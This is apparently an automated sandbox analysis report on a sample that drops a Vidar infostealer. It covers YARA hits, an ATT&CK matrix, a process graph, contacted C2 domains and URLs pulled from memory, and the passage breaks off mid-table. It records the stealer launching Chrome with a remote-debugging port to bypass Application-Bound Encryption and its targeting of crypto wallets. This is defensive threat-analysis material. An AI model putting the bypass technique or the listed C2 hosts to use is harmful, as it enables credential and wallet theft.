                Source: Ensures.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Wb.comBinary or memory string: WIN_XPe
                Source: Wb.comBinary or memory string: WIN_VISTA
                Source: Wb.comBinary or memory string: WIN_7
                Source: Wb.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01032263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_01032263
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01031C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_01031C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                Process Injection                		111
                Masquerading                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync11
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579962 Sample: ChoForgot.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 61 bijutr.shop 2->61 63 t.me 2->63 65 jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx 2->65 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 5 other signatures 2->91 10 ChoForgot.exe 17 2->10         started        12 msedge.exe 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        95 Maps a DLL or memory area into another process 12->95 19 msedge.exe 12->19         started        22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 3 other processes 12->26 process6 dnsIp7 55 C:\Users\user\AppData\Local\Temp\...\Wb.com, PE32 15->55 dropped 83 Drops PE files with a suspicious file extension 15->83 28 Wb.com 29 15->28         started        32 cmd.exe 2 15->32         started        34 extrac32.exe 17 15->34         started        36 8 other processes 15->36 67 20.110.205.119, 443, 49987 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->67 69 204.79.197.219, 443, 49992, 49993 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->69 71 17 other IPs or domains 19->71 file8 signatures9 process10 dnsIp11 77 bijutr.shop 188.245.216.205, 443, 49759, 49765 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 28->77 79 t.me 149.154.167.99, 443, 49752 TELEGRAMRU United Kingdom 28->79 81 127.0.0.1 unknown unknown 28->81 97 Attempt to bypass Chrome Application-Bound Encryption 28->97 99 Found many strings related to Crypto-Wallets (likely being stolen) 28->99 101 Found API chain indicative of sandbox detection 28->101 103 4 other signatures 28->103 38 msedge.exe 2 10 28->38         started        41 chrome.exe 28->41         started        44 cmd.exe 28->44         started        signatures12 process13 dnsIp14 93 Monitors registry run keys for changes 38->93 46 msedge.exe 38->46         started        73 192.168.2.6, 443, 49288, 49478 unknown unknown 41->73 75 239.255.255.250 unknown Reserved 41->75 48 chrome.exe 41->48         started        51 conhost.exe 44->51         started        53 timeout.exe 44->53         started        signatures15 process16 dnsIp17 57 www.google.com 172.217.21.36, 443, 49805, 49806 GOOGLEUS United States 48->57 59 bingadsedgeextension-prod-europe.azurewebsites.net 48->59

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ChoForgot.exe11%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\623615\Wb.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://anglebug.com/7761e-data0%Avira URL Cloudsafe
                https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
                http://anglebug.com/7488/0%Avira URL Cloudsafe
                http://anglebug.com/6048-0%Avira URL Cloudsafe
                http://anglebug.com/7279Q0%Avira URL Cloudsafe
                https://bijutr.shop936ed13bd8700%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bijutr.shop
                		188.245.216.205
                		truetrue
                  		unknown
                  chrome.cloudflare-dns.com
                  		172.64.41.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		3.160.188.50
                        		truefalse
                          		high
                          www.google.com
                          		172.217.21.36
                          		truefalse
                            		high
                            googlehosted.l.googleusercontent.com
                            		172.217.19.225
                            		truefalse
                              		high
                              assets.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                c.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  deff.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        bzib.nelreports.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            api.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://c.msn.com/c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBCfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabWb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drfalse
                                                  		high
                                                  https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drfalse
                                                      		high
                                                      https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/document/Jchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anglebug.com/4633chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://google-ohttp-relay-join.fastly-edge.com/jhchrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://anglebug.com/7382chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://google-ohttp-relay-join.fastly-edge.com/Ihchrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://issuetracker.google.com/284462263msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.22.drfalse
                                                                            		high
                                                                            https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://deff.nelreports.net/api/reportReporting and NEL.23.drfalse
                                                                                		high
                                                                                https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                    		high
                                                                                    https://docs.google.com/document/:chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.23.drfalse
                                                                                          		high
                                                                                          https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2561579862.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641806972.000047E400A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://anglebug.com/7714chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://anglebug.com/7761e-datachrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://anglebug.com/6048-chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://unisolated.invalid/chrome.exe, 00000011.00000002.2641605337.000047E4009E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.google.com/chrome/tips/chrome.exe, 00000011.00000002.2640778355.000047E4007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640506644.000047E40072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641393049.000047E400968000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.google.com/?lfhs=2chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://anglebug.com/6248chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/7488/chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://anglebug.com/6929chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/5281chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.youtube.com/?feature=ytcachrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://t.me/k04ael.0cWb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643937529.000047E400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://anglebug.com/7246chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://anglebug.com/7369chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://anglebug.com/7489chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://duckduckgo.com/?q=chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641065863.000047E400880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://chrome.google.com/webstorechrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2776605861.00005B800237C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://drive-daily-2.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                    		high
                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiWb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drfalse
                                                                                                                                      		high
                                                                                                                                      http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 